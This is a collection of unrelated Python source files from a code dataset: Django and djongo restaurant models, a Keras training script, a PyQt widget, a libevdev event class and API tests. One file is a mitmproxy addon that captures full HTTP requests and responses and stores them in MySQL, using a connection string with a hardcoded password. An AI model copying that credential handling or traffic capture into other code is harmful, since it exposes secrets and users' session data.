list(set(['Li','Chen','Yu'])-set([request.POST['optionsRadios']]))\n controller = DBcontrolLer()\n orderList = controller.getOrderList()\n '''\n orderList = [\n {\"username\":\"Li\",\n \"shops\":[\n {\"shopname\":\"shop1\", \"discount\":\"free\",\"baseprice\":\"5yuan\",\"dishes\":[\n {\"dishname\":\"dish11\",\"price\":\"price1\"},{\"dishname\":\"dish12\",\"price\":\"price1\"}]},\n {\"shopname\":\"shop2\", \"discount\":\"free\",\"baseprice\":\"5yuan\",\"dishes\":[\n {\"dishname\":\"dish11\",\"price\":\"price1\"},{\"dishname\":\"dish12\",\"price\":\"price1\"}]}\n ]\n },\n {\"username\":\"Chen\",\n \"shops\":[\n {\"shopname\":\"shop1\", \"discount\":\"free\",\"baseprice\":\"5yuan\",\"dishes\":[\n {\"dishname\":\"dish1\",\"price\":\"price1\"},{\"dishname\":\"dish1\",\"price\":\"price1\"}]},\n {\"shopname\":\"shop2\", \"discount\":\"free\",\"baseprice\":\"5yuan\",\"dishes\":[\n {\"dishname\":\"dish1\",\"price\":\"price1\"},{\"dishname\":\"dish1\",\"price\":\"price1\"}]}\n ]\n },\n {\"username\":\"Yu\",\n \"shops\":[\n {\"shopname\":\"shop1\", \"discount\":\"free\",\"baseprice\":\"5yuan\",\"dishes\":[\n {\"dishname\":\"dish1\",\"price\":\"price1\"},{\"dishname\":\"dish1\",\"price\":\"price1\"}]},\n {\"shopname\":\"shop2\", \"discount\":\"free\",\"baseprice\":\"5yuan\",\"dishes\":[\n {\"dishname\":\"dish1\",\"price\":\"price1\"},{\"dishname\":\"dish1\",\"price\":\"price1\"}]}\n ]\n }]\n '''\n return 
render_to_response(\"home_module.html\",{'name':request.POST['optionsRadios'],'others':others,'orderList':orderList})","sub_path":"fdapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"143327241","text":"from djongo import models\nfrom bson import ObjectId\nfrom restaurant.cuisine_dict import load_dict\nfrom restaurant.enum import Prices, Categories\nfrom django.core.exceptions import ObjectDoesNotExist\nimport requests\nfrom utils.model_util import save_and_clean, update_model_geo, model_refresh\nfrom geo.geo_controller import geocode\n\nFOOD_PICTURE = 'https://storage.googleapis.com/default-assets/no-image.png'\n\nRESTAURANT_COVER = 'https://storage.googleapis.com/default-assets/cover.jpg'\nRESTAURANT_LOGO = 'https://storage.googleapis.com/default-assets/logo.jpg'\nDISHES = 'dishes.csv'\n\n\nclass Food(models.Model):\n \"\"\" Model for the Food Items on the Menu \"\"\"\n _id = models.ObjectIdField()\n name = models.CharField(max_length=50, default='')\n restaurant_id = models.CharField(max_length=24)\n description = models.CharField(max_length=200, blank=True, default='')\n picture = models.CharField(max_length=200, blank=True,\n default=FOOD_PICTURE)\n price = models.DecimalField(max_digits=6, decimal_places=2)\n tags = models.ListField(default=[], blank=True)\n specials = models.CharField(max_length=51, blank=True)\n category = models.CharField(max_length=50, blank=True, default='')\n\n class Meta:\n unique_together = ((\"name\", \"restaurant_id\"),)\n\n def is_tagged(self, tag):\n \"\"\"\n check if food is tagged with tag 'tag'\n @param tag: referenced tag\n @return: boolean\n \"\"\"\n return tag._id in self.tags\n\n @classmethod\n def add_dish(cls, food_data):\n \"\"\"\n insert dish into database and return response\n :param food_data: dictionary representation of dish\n :return: Food model object\n \"\"\"\n dish = cls(\n name=food_data['name'],\n restaurant_id=food_data['restaurant_id'],\n description=food_data['description'],\n price=food_data['price'],\n specials=food_data['specials'],\n category=food_data['category'],\n )\n save_and_clean(dish)\n dish = model_refresh(Food, {'name': dish.name, 'restaurant_id': dish.restaurant_id})\n restaurant = Restaurant.objects.get(_id=food_data['restaurant_id'])\n if not restaurant.category_exists(food_data['category']):\n restaurant.categories.append(food_data['category'])\n restaurant.save(update_fields=['categories'])\n return dish\n\n\n\n @classmethod\n def get_by_restaurant(cls, rest_id):\n \"\"\"\n Retrieve restaurant by id\n :param rest_id: id of restaurant\n :return: restaurant data in json\n \"\"\"\n return list(Food.objects.filter(restaurant_id=rest_id))\n\n @classmethod\n def field_validate(self, fields):\n \"\"\"\n Validates fields\n :param fields: Dictionary of fields to validate\n :return: A list of fields that were invalid. 
Returns None if all fields are valid\n \"\"\"\n dish_urls = ['picture']\n invalid = {'Invalid': []}\n\n for field in dish_urls:\n if field in fields and fields[field] != '':\n try:\n requests.get(fields[field])\n except (requests.ConnectionError, requests.exceptions.MissingSchema):\n invalid['Invalid'].append(field)\n\n if not invalid['Invalid']:\n return None\n else:\n return invalid\n\n def clean_description(self):\n description = {food for food in self.description.split(' ')}\n clean_description = set()\n for word in description: # clean word, remove non alphabetical\n clean_description.add(''.join(e for e in word if e.isalpha()))\n clean_description = set(map(str.lower, clean_description))\n return clean_description\n\n\nclass ManualTag(models.Model):\n \"\"\" Model for Manual Tags \"\"\"\n _id = models.ObjectIdField()\n category = models.CharField(max_length=4, choices=Categories.choices())\n value = models.CharField(max_length=50)\n foods = models.ListField(default=[], blank=True)\n\n @classmethod\n def clear_food_tags(cls, food_name, restaurant_id):\n \"\"\"\n Destroy all food-tag relationships for food\n :param food_name: name of food\n :param restaurant_id: id of restaurant\n :return: None\n \"\"\"\n food = Food.objects.get(name=food_name,\n restaurant_id=restaurant_id)\n for tag_id in food.tags:\n tag = ManualTag.objects.get(_id=tag_id)\n tag.remove_food(food._id)\n food.tags = []\n food.save()\n\n def remove_food(self, food_id):\n \"\"\"\n remove food_id from tag\n @param food_id: referenced food_id\n \"\"\"\n self.foods.remove(food_id)\n self.save()\n\n @classmethod\n def add_tag(cls, food_name, restaurant_id, category, value):\n \"\"\"\n Add tag to food\n :param food_name: name of food\n :param restaurant_id: id of restaurant\n :param category: category of following tag\n :param value: value of following tag\n :return: following tag object\n \"\"\"\n food = Food.objects.get(name=food_name,\n restaurant_id=restaurant_id)\n if not ManualTag.tag_exists(value, category):\n tag = cls(value=value, category=category, foods=[food._id])\n save_and_clean(tag)\n return tag\n\n tag = ManualTag.objects.get(value=value, category=category)\n if not food.is_tagged(tag):\n add_new_tag(food, tag)\n return tag\n\n @classmethod\n def tag_exists(cls, value, category):\n return cls.objects.filter(value=value, category=category).exists()\n\n @classmethod\n def auto_tag_food(cls, _id):\n \"\"\"\n generate tags based on food description\n :param _id: id of food\n :return: list of generated tags\n \"\"\"\n dish = Food.objects.get(_id=ObjectId(_id))\n clean_description = dish.clean_description()\n cuisine_dict = load_dict.read(DISHES)\n keywords = clean_description.intersection(cuisine_dict)\n tags = ManualTag.tag_description(keywords, dish) # classmethod, no instance needed\n return tags\n\n def __eq__(self, other):\n # the model stores a 'foods' list, not a 'food' attribute\n return self.foods == other.foods and self.category == other.category and self.value == other.value\n\n\n @classmethod\n def tag_description(cls, keywords, dish):\n tags = []\n for keyword in keywords:\n tags.append(cls.add_tag(dish.name, dish.restaurant_id, Categories.DI.name, keyword))\n return tags\n\n\ndef add_new_tag(food, tag):\n \"\"\"\n add new tag-food relationship\n @param food: food model\n @param tag: tag model\n \"\"\"\n food.tags.append(tag._id)\n tag.foods.append(food._id)\n tag.save()\n food.save()\n\n\nclass Restaurant(models.Model):\n \"\"\" Model for Restaurants \"\"\"\n _id = models.ObjectIdField()\n name = models.CharField(max_length=30)\n address = models.CharField(max_length=60)\n phone = 
models.BigIntegerField(null=True)\n email = models.EmailField(unique=True)\n city = models.CharField(max_length=40)\n cuisine = models.CharField(max_length=30)\n pricepoint = models.CharField(max_length=10, choices=Prices.choices())\n twitter = models.CharField(max_length=200, blank=True)\n instagram = models.CharField(max_length=200, blank=True)\n bio = models.TextField(null=True)\n GEO_location = models.CharField(max_length=200)\n external_delivery_link = models.CharField(max_length=200, blank=True)\n cover_photo_url = models.CharField(max_length=200,\n default='https://storage.googleapis.com/default-assets/cover.jpg')\n logo_url = models.CharField(max_length=200,\n default='https://storage.googleapis.com/default-assets/logo.jpg')\n rating = models.DecimalField(max_digits=3, decimal_places=2, default=0.00)\n owner_name = models.CharField(max_length=50, blank=True)\n owner_story = models.CharField(max_length=3000, blank=True)\n owner_picture_url = models.CharField(max_length=200, blank=True)\n categories = models.ListField(default=[], blank=True)\n\n def category_exists(self, category):\n \"\"\"\n Check whether category is new\n @param category: referenced category\n @return: boolean\n \"\"\"\n return category in self.categories\n\n @classmethod\n def get(cls, _id):\n \"\"\"\n retrieve restaurant based on id\n :param _id: id of restaurant\n :return: restaurant json or None\n \"\"\"\n try:\n restaurant = Restaurant.objects.get(_id=_id)\n return restaurant\n except ObjectDoesNotExist:\n return None\n\n @classmethod\n def insert(cls, restaurant_data):\n \"\"\"\n Insert restaurant into database given restaurant data\n :param restaurant_data: json data of restaurant\n :return: restaurant object representing sent data\n \"\"\"\n try:\n cls.objects.get(email=restaurant_data['email'])\n raise ValueError('Cannot insert')\n except ObjectDoesNotExist:\n restaurant = cls(\n **restaurant_data\n )\n update_model_geo(restaurant, restaurant_data['address'])\n restaurant = save_and_clean(restaurant)\n return restaurant\n\n @classmethod\n def field_validate(self, fields):\n \"\"\"\n Validates fields\n :param fields: Dictionary of fields to validate\n :return: A list of fields that were invalid. 
Returns None if all fields are valid\n \"\"\"\n restaurant_urls = ['twitter', 'instagram', 'cover_photo_url', 'logo_url', 'owner_picture_url',\n 'external_delivery_link']\n\n invalid = {'Invalid': []}\n\n for field in restaurant_urls:\n if field in fields and fields[field] != '':\n try:\n requests.get(fields[field])\n except (requests.ConnectionError, requests.exceptions.MissingSchema):\n invalid['Invalid'].append(field)\n\n if 'phone' in fields and fields['phone'] is not None:\n if len(str(fields['phone'])) != 10:\n invalid['Invalid'].append('phone')\n if 'address' in fields:\n try:\n geocode(fields['address'])\n except ValueError:\n invalid['Invalid'].append('address')\n if len(invalid['Invalid']) == 0:\n return None\n else:\n return invalid\n","sub_path":"server/restaurant/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"278789910","text":"\r\n# -*- coding: utf-8 -*-\r\n\r\n########################################\r\nfrom sqlalchemy import create_engine, Column, Integer, String, LargeBinary,Boolean\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nfrom sqlalchemy.orm import sessionmaker\r\n\r\nSURL = \"mysql+pymysql://cic_admin:TaBoq,,1234@192.168.1.170:3306/cicjust_splinter?charset=utf8&autocommit=true\"\r\nengine = create_engine(SURL) # define the engine\r\nBase = declarative_base() # base class that every table model inherits from\r\nsession = sessionmaker(engine)() # database session used for all operations\r\n\r\nclass JCDFLOWSAVE(Base):\r\n __tablename__ = 'jcdflowsave'\r\n id = Column(Integer, primary_key=True)\r\n now_time = Column(String(40))\r\n request = Column(LargeBinary())\r\n response = Column(LargeBinary())\r\n path = Column(String(100))\r\n status = Column(Boolean)\r\n\r\n# Base.metadata.drop_all(engine)\r\n# Base.metadata.create_all(engine) # create the tables for all Base subclasses.\r\n\r\n########################################\r\n'''inter-process communication via a queue'''\r\nfrom multiprocessing import Process, Queue\r\nq = Queue()\r\n\r\ndef write_queue(q,dicts):\r\n q.put(dicts)\r\n\r\ndef read_queue(q):\r\n while True:\r\n dicts = q.get(True)\r\n request = dicts['request']\r\n response = dicts['response']\r\n now_time = dicts['now_time']\r\n try:\r\n result = JCDFLOWSAVE(now_time=now_time, request=request, response=response, path='',\r\n status=False) # create an object, i.e. one table row\r\n session.add(result) # stage the object for the database\r\n session.commit() # nothing reaches the database until commit is executed\r\n except Exception as e:\r\n print(e)\r\n session.rollback() # roll back if the commit fails\r\n res = pickle.loads(response) # unpickle the object from the byte string\r\n path = '../response/{}.txt'.format(now_time)\r\n with open(path, 'wb') as fw: # serialize the data to a Python-specific format and write it to a file\r\n pickle.dump(res, fw)\r\n result = JCDFLOWSAVE(now_time=now_time, request=request, path=path, status=False)\r\n session.add(result)\r\n session.commit()\r\n########################################\r\n'''asynchronous calls via a process pool'''\r\nfrom multiprocessing import Pool\r\npool = Pool()\r\n# pool.close()\r\n# pool.join()\r\n########################################\r\n'''asynchronous calls via a thread decorator'''\r\nfrom threading import Thread # Thread starts a new thread that executes the function fn.\r\n# from threading import Lock\r\n# lock=Lock()\r\n# lock.acquire()\r\n# '''share data'''\r\n# lock.release()\r\nimport threading\r\nimport os\r\ndef async_call(fn):\r\n def wrapper(*args, **kwargs):\r\n # the target keyword argument specifies the thread function\r\n thr = Thread(target=fn, args=args, kwargs=kwargs) # the class that represents and controls a thread.\r\n # print(thr.isDaemon()) # False\r\n # thr.setDaemon(True)\r\n '''if it is a daemon (background) thread: while the main thread runs, the background thread runs too, but once the main thread finishes, the program stops no matter whether the background thread has finished;
if it is a foreground thread: while the main thread runs, the foreground thread runs too, and when the main thread finishes, the program waits for the foreground thread to finish before stopping'''\r\n thr.start()\r\n # print(thr.is_alive()) # True\r\n # thr.join() # 0.10622406005859375 blocks the calling thread until the joined thread terminates or the given timeout is reached\r\n return wrapper\r\n\r\n@async_call\r\ndef thread_save_data(request, response, now_time):\r\n '''persist the flow data'''\r\n # print(threading.current_thread().name) # Thread-8\r\n try:\r\n result = JCDFLOWSAVE(now_time=now_time, request=request, response=response, path='',status=False) # create an object, i.e. one table row\r\n session.add(result) # stage the object for the database\r\n session.commit() # nothing reaches the database until commit is executed\r\n except Exception as e:\r\n print(e)\r\n session.rollback() # roll back if the commit fails\r\n res = pickle.loads(response) # unpickle the object from the byte string\r\n path = '../response/{}.txt'.format(now_time)\r\n with open(path, 'wb') as fw: # serialize the data to a Python-specific format and write it to a file\r\n pickle.dump(res, fw)\r\n result = JCDFLOWSAVE(now_time=now_time, request=request, path=path,status=False)\r\n session.add(result)\r\n session.commit()\r\n########################################\r\n\r\nimport pickle\r\nimport time\r\n\r\n# man-in-the-middle proxy\r\nimport mitmproxy.addonmanager\r\nimport mitmproxy.connections\r\nimport mitmproxy.http\r\nimport mitmproxy.log\r\nimport mitmproxy.proxy.protocol\r\nimport mitmproxy.tcp\r\nimport mitmproxy.websocket\r\n\r\ndef save_data(request, response, now_time):\r\n '''persist the flow data'''\r\n try:\r\n result = JCDFLOWSAVE(now_time=now_time, request=request, response=response, path='',status=False) # create an object, i.e. one table row\r\n session.add(result) # stage the object for the database\r\n session.commit() # nothing reaches the database until commit is executed\r\n except Exception as e:\r\n print(e)\r\n session.rollback() # roll back if the commit fails\r\n res = pickle.loads(response) # unpickle the object from the byte string\r\n path = '../response/{}.txt'.format(now_time)\r\n with open(path, 'wb') as fw: # serialize the data to a Python-specific format and write it to a file\r\n pickle.dump(res, fw)\r\n result = JCDFLOWSAVE(now_time=now_time, request=request, path=path,status=False)\r\n session.add(result)\r\n session.commit()\r\n\r\nlinks = ['portal/initPortal',\r\n 'edf/org/queryAll',\r\n '/ba/bankAccount/queryList',\r\n '/v1/gl/docManage/query',\r\n '/ba/inventory/queryList',\r\n '/ba/supplier/queryList',\r\n '/account/query',\r\n '/customer/queryList',\r\n '/v1/ba/person/queryList',\r\n '/balancesumrpt/query',\r\n '/balanceauxrpt/query',\r\n 'myip.ipip']\r\n\r\nclass Proxy():\r\n\r\n def request(self, flow: mitmproxy.http.HTTPFlow):\r\n '''intercept request data'''\r\n # print('request-start######################')\r\n # print(os.getpid()) # 25401\r\n # print(os.getppid()) # 19687\r\n # print('request-end######################')\r\n # print(threading.current_thread().name) # MainThread\r\n # print(threading.current_thread().getName()) # MainThread\r\n # print(threading.current_thread().is_alive()) # True\r\n # print(threading.current_thread().isDaemon()) # False\r\n\r\n def response(self, flow: mitmproxy.http.HTTPFlow):\r\n '''intercept response data'''\r\n # print('request-start######################')\r\n # print(os.getpid()) # 25401\r\n # print(os.getppid()) # 19687\r\n # print('request-end######################')\r\n # print(threading.current_thread().name)\r\n # print(threading.current_thread().getName())\r\n # print(threading.current_thread().is_alive())\r\n # print(threading.current_thread().isDaemon())\r\n for l in links:\r\n if '/account/queryCalcUsage' in flow.request.url: # work around the overlap between the similar /account/query and /account/queryCalcUsage URLs\r\n pass\r\n elif l in flow.request.url:\r\n request = pickle.dumps(flow.request)\r\n response = pickle.dumps(flow.response)\r\n now_time = time.strftime('%Y_%m_%d_%H:%M:%S', 
time.localtime(time.time())) # 2019_12_25_10:12:10 str\r\n\r\n # start_time = time.time()\r\n\r\n # save_data(request, response, now_time) # 0.07043313980102539\r\n\r\n thread_save_data(request, response, now_time) # 0.0054090023040771484\r\n\r\n # res = pool.apply_async(save_data, args=(request,response,now_time)) # 0.0003180503845214844\r\n # pool.close() # stop the pool from accepting new tasks\r\n # pool.join() # wait until every task in the pool has finished\r\n # print(res.get()) # get() would collect the results once the pool tasks finish, but the proxy would have to exit first; no data ever reached the database\r\n\r\n # dicts = {'request':request,'response':response,'now_time':now_time}\r\n # Process(target=write_queue, args=(q, dicts)).start()\r\n # Process(target=write_queue, args=(q, dicts)).join() # unusable here, the proxy is not started as a plain function.\r\n\r\n # end_time = time.time()\r\n # print('run time: {}'.format(end_time - start_time))\r\n break\r\n\r\naddons = [Proxy()]\r\n########################################\r\nif __name__ == '__main__':\r\n pass\r\n # Base.metadata.drop_all(engine)\r\n # Base.metadata.create_all(engine) # create the tables for all Base subclasses.\r\n","sub_path":"proxy/proxy_v1.py","file_name":"proxy_v1.py","file_ext":"py","file_size_in_byte":9105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"451712359","text":"from sympy import *\nfrom sympy.galgebra.ga import *\n\ndef is_near_equal(v1, v2):\n \"\"\" A function which takes two sympy multivector arguments\n and compares them making sure that they are within\n the specified tolerance.\n \"\"\"\n diff = v1 - v2\n if (diff|diff) <= 0.001: # if v1 and v2 are near-equal, the squared magnitude of their difference is near zero (a zero dot product would only mean orthogonality)\n return True\n else:\n return False\n \n \ndef is_near_zero(v1):\n \"\"\" A function which takes a scalar argument\n and verifies that its magnitude is sufficiently small.\n \"\"\"\n if abs(v1) <= 0.001:\n return True\n else:\n return False\n \n\ndef are_near_same(set):\n \"\"\" A function which compares a set of objects.\n They must all be of the same type and their\n values must be individually in range.\n \"\"\"\n result = True\n for v in set:\n for s in set:\n result = is_near_equal(v,s)\n if not result: return result # one pair differs - not near same\n return result","sub_path":"src/main/python/isis/geom/model/tolerance.py","file_name":"tolerance.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"249875298","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tqdm.keras import TqdmCallback\nfrom sklearn.preprocessing import MinMaxScaler\n\n# Enable full width output for numpy (https://stackoverflow.com/questions/43514106/python-terminal-output-width)\nnp.set_printoptions(suppress=True, linewidth=250, threshold=250)\n\ndef split_data(data, ratio):\n '''\n Create randomized train set and test set based on the ratio\n ---\n Input:\n data[pd df] data\n ratio[int] test:train ratio\n Output:\n testdata[pd df]\n traindata[pd df]\n '''\n # Generate random indices\n indices = np.random.permutation(len(data))\n # Calculate how many entries the test data will have\n test_size = int(len(data)*ratio)\n # Get the test indices from the randomly generated indices\n test_indices = indices[:test_size]\n # Get the train indices from the randomly generated indices\n train_indices = indices[test_size:]\n # Return the data corresponding to the indices\n return data.iloc[test_indices], data.iloc[train_indices]\n\n\ndef get_data(source):\n '''\n Import data from files\n ---\n Input:\n source[str] 
'self' or 'paper'\n Output:\n data[pd df] data\n '''\n if source == 'self':\n data = pd.read_feather('data.feather')\n return data.copy()\n elif source == 'paper':\n csv_data = pd.read_csv('datafra.csv', names=['1', '2', '3', '4', '5', '6', '7', '8', '9']).reset_index()\n csv_labels = pd.read_csv('datacur.csv', names=['Curvature']).reset_index()\n data = csv_labels.merge(csv_data, on='index').drop(columns=['index'], axis=1)\n return data.copy()\n else:\n print('invalid from')\n\n\ndef build_model():\n # Build keras model\n model = tf.keras.Sequential([\n layers.Dense(120, activation='tanh', kernel_initializer='he_normal', input_shape=(9,)),\n layers.Dense(74, activation='tanh', kernel_initializer='he_normal'),\n layers.Dense(50, activation='tanh', kernel_initializer='he_normal'),\n layers.Dense(50, activation='tanh', kernel_initializer='he_normal'),\n layers.Dense(20, activation='tanh', kernel_initializer='he_normal'),\n layers.Dense(1, activation='linear')\n ])\n\n # Compile model\n model.compile(optimizer=tf.keras.optimizers.Adam(0.0004), loss='mse', metrics=['mae', 'mse'])\n return model\n\n\ndef train_model(model, train_data, train_labels, regenerate=True):\n # Build tensorflow dataset\n dataset = tf.data.Dataset.from_tensor_slices((train_data, train_labels)).batch(32)\n if regenerate:\n # Train Model\n # model.fit(train_data, train_labels, verbose=0, callbacks=[TqdmCallback(verbose=1)], epochs=1000, batch_size=8192, validation_split=0.2)\n early_stopping_callback = keras.callbacks.EarlyStopping(monitor='loss', min_delta=10e-8, patience=6, verbose=0, mode='auto', baseline=None)\n model.fit(dataset, verbose=0, callbacks=[TqdmCallback(verbose=1), early_stopping_callback], epochs=1000)\n\n # Save model\n model.save('model.h5')\n else:\n model = tf.keras.models.load_model('model.h5')\n print(model.summary())\n\n return model\n\n\ndef validate_model(model, train_data, train_labels):\n # Validate model\n train_predictions = model.predict(train_data, batch_size=64).flatten()\n\n plt.axes(aspect='equal')\n plt.scatter(train_labels, train_predictions, alpha=0.1)\n plt.xlabel('True Values [MPG]')\n plt.ylabel('Predictions [MPG]')\n lims = [-0.25, 0.25]\n plt.xlim(lims)\n plt.ylim(lims)\n _ = plt.plot(lims, lims)\n plt.show()\n\n\nif __name__ == '__main__':\n # Read data\n data = get_data('self')\n\n # data = data.iloc[30:40,:]\n # Normalize curvature\n # data['Curvature'] = data['Curvature']/data['Curvature'].max()\n # data['Curvature'] = np.log(data['Curvature'])\n\n # Split data\n test_set, train_set = split_data(data, 0.2)\n\n # Split the training and test data into labels (first column) and data\n test_labels = np.round(test_set.iloc[:, 0].to_numpy(), 3)\n test_data = np.round(test_set.iloc[:, 1:].to_numpy(), 3)\n train_labels = np.round([train_set.iloc[:, 0].to_numpy()], 3).T\n train_data = np.round(train_set.iloc[:, 1:].to_numpy(), 3)\n\n # scaler = MinMaxScaler()\n # train_labels = scaler.fit_transform(train_labels)\n # print(f'train_data: \\n{train_data}')\n # print(f'train_labels: \\n{train_labels}')\n # '''\n model = build_model()\n\n model = train_model(model, train_data, train_labels)\n\n validate_model(model, train_data, train_labels)\n # '''\n","sub_path":"Qi/ML.py","file_name":"ML.py","file_ext":"py","file_size_in_byte":4686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"410904178","text":"from PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QWidget\n\nfrom installation import Installation\n\n\nclass 
EditorWidget(QWidget):\n def __init__(self, parent, ui_module, icon=\"\"):\n QWidget.__init__(self, parent)\n\n self.ui = ui_module.Ui_Form()\n self.ui.setupUi(self)\n\n self.icon = icon\n self.installation = self.window().active_installation\n self.file_path = \"\"\n self.res_ref = \"\"\n self.res_type = None\n\n def save_existing(self):\n raise NotImplementedError\n\n def save_to_path(self):\n raise NotImplementedError\n\n def save_to_module(self):\n raise NotImplementedError\n\n def setup(self, file_path, res_ref, res_type):\n file_tabs = self.window().ui.file_tabs\n file_tabs.addTab(self, res_ref + \".\" + res_type.extension)\n tab_index = -1\n for i in range(file_tabs.count()):\n if file_tabs.widget(i) == self:\n tab_index = i\n\n if self.installation is None:\n file_tabs.setTabIcon(tab_index, QIcon(\":/kx_icons/\" + self.icon))\n elif self.installation.is_tsl():\n file_tabs.setTabIcon(tab_index, QIcon(\":/k2_icons/\" + self.icon))\n else:\n file_tabs.setTabIcon(tab_index, QIcon(\":/k1_icons/\" + self.icon))\n\n installation_name = \"None\" if self.installation is None else self.installation.name\n file_tabs.setTabToolTip(tab_index, \"Path: \" + file_path + \"\\n\" +\n \"Resource: \" + res_ref + \".\" + res_type.extension + \"\\n\" +\n \"Installation: \" + installation_name)\n\n def load(self, some_data):\n raise NotImplementedError\n\n\n","sub_path":"widgets/editor_widget.py","file_name":"editor_widget.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"547025143","text":"# -*- coding: latin-1 -*-\n# Copyright © 2017 Red Hat, Inc.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice (including the next\n# paragraph) shall be included in all copies or substantial portions of the\n# Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n\nfrom .const import EventType, EventCode\n\n\nclass InputEvent(object):\n \"\"\"\n Represents one input event of type struct input_event as defined in\n ``linux/input.h`` and returned by ``libevdev_next_event()``.\n\n Comparison between events can be done via the :func:`matches()` function\n or by comparing two input events. 
Two events match when their most\n precise attribute match and all other attributes are None::\n\n >>> e = InputEvent(libevdev.EV_REL.REL_X, value=1)\n >>> e == InputEvent(libevdev.EV_REL)\n True\n >>> e == InputEvent(libevdev.EV_ABS)\n True\n >>> e == InputEvent(libevdev.EV_REL.REL_X)\n True\n >>> e == InputEvent(libevdev.EV_REL.REL_Y)\n False\n >>> e == InputEvent(libevdev.EV_REL.REL_X, value=1)\n True\n >>> e == InputEvent(libevdev.EV_REL.REL_X, value=2)\n False\n\n .. attribute:: code\n\n The :class:`EventCode` or :class:`EventType` for this input event\n\n .. attribute:: value\n\n The (optional) value for the event's axis\n\n .. attribute:: sec\n\n The timestamp, seconds\n\n .. attribute:: usec\n\n The timestamp, microseconds\n \"\"\"\n\n def __init__(self, code, value=None, sec=0, usec=0):\n assert isinstance(code, EventCode) or isinstance(code, EventType)\n\n if isinstance(code, EventCode):\n self._type = code.type\n self._code = code\n else:\n self._type = code\n self._code = None\n self.sec = sec\n self.usec = usec\n self.value = value\n\n @property\n def code(self):\n \"\"\"\n :return: the EventCode for this event or None\n :rtype: EventCode\n \"\"\"\n return self._code\n\n @property\n def type(self):\n \"\"\"\n :return: the event type for this event\n :rtype: EventType\n \"\"\"\n return self._type\n\n def matches(self, code, value=None):\n \"\"\"\n :param code: the event type or code\n :type code: EventType or EventCode\n :param value: optional, the event value\n :return: True if the type matches this event's type and this event's\n code matches the given code (if any) and this event's value\n matches the given value (if any)\n\n Check if an event matches a given event type and/or code. The\n following invocations show how to match on an event type, an event\n code and an event code with a specific value::\n\n\n if ev.matches(libevdev.EV_REL):\n pass\n\n if ev.matches(libevdev.EV_REL.REL_X):\n pass\n\n if ev.matches(libevdev.EV_REL.REL_X, 1):\n pass\n \"\"\"\n\n if value is not None and self.value is not None and self.value != value:\n return False\n\n if isinstance(code, EventType):\n return self._type == code\n else:\n return self._code == code\n\n def __eq__(self, other):\n if not isinstance(other, InputEvent):\n return False\n\n if self.code is None or other.code is None:\n return self.matches(other.type, other.value)\n\n return self.matches(other.code, other.value)\n\n def __repr__(self):\n tname = self.type.name\n cname = None\n if self.code is not None:\n cname = self.code.name\n return 'InputEvent({}, {}, {})'.format(tname, cname, self.value)\n","sub_path":"RG351P-M/Ubuntu OS Partition/usr/lib/python3/dist-packages/libevdev/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"52813640","text":"# -*- coding: UTF-8 -*-\nimport sys, os\nsys.path.append(os.path.abspath('../../..'))\nimport unittest\nfrom lib.restful_requests import *\nfrom lib.metadata_common_methods import MetadataCommonMethods\n\n# Set up global variables\n\nCONFIG_FILE = '../../../config/metadata_v1.conf'\nmetadata = MetadataCommonMethods(CONFIG_FILE)\nURL = metadata.conf.get_config('Basic', 'url')\nHEADERS = {'Content-Type': 'application/json'}\nSECTION = 'Attribute'\narguments = ['username']\n\n\nclass MetadataAttributeTest(unittest.TestCase):\n\n def setUp(self):\n # Initialize metadata_v1 object\n metadata.get_and_set(URL, SECTION, HEADERS, arguments)\n global items\n items = 
metadata.conf.get_all_items(SECTION)\n self.session = RestfulRequests()\n self.session.create_session(url=URL, headers=HEADERS)\n\n def test_get_db_attribute_list(self):\n uri = items['get_db_attribute_list_uri']\n response = self.session.get_request(uri=uri, headers=HEADERS)\n self.assertEqual(response.status_code, 200, msg='%s != 200\\n Request URL is %s' % (response.status_code, (URL+uri)))\n return response\n\n def test_get_table_attribute_list(self):\n uri = items['get_table_attribute_list_uri']\n response = self.session.get_request(uri=uri, headers=HEADERS)\n self.assertEqual(response.status_code, 200, msg='%s != 200\\n Request URL is %s' % (response.status_code, (URL+uri)))\n return response\n\n def test_get_column_attribute_list(self):\n uri = items['get_column_attribute_list_uri']\n response = self.session.get_request(uri=uri, headers=HEADERS)\n self.assertEqual(response.status_code, 200, msg='%s != 200\\n Request URL is %s' % (response.status_code, (URL+uri)))\n return response\n\n def test_get_attribute_values_list(self):\n uri = items['get_attribute_values_list_uri']\n response = 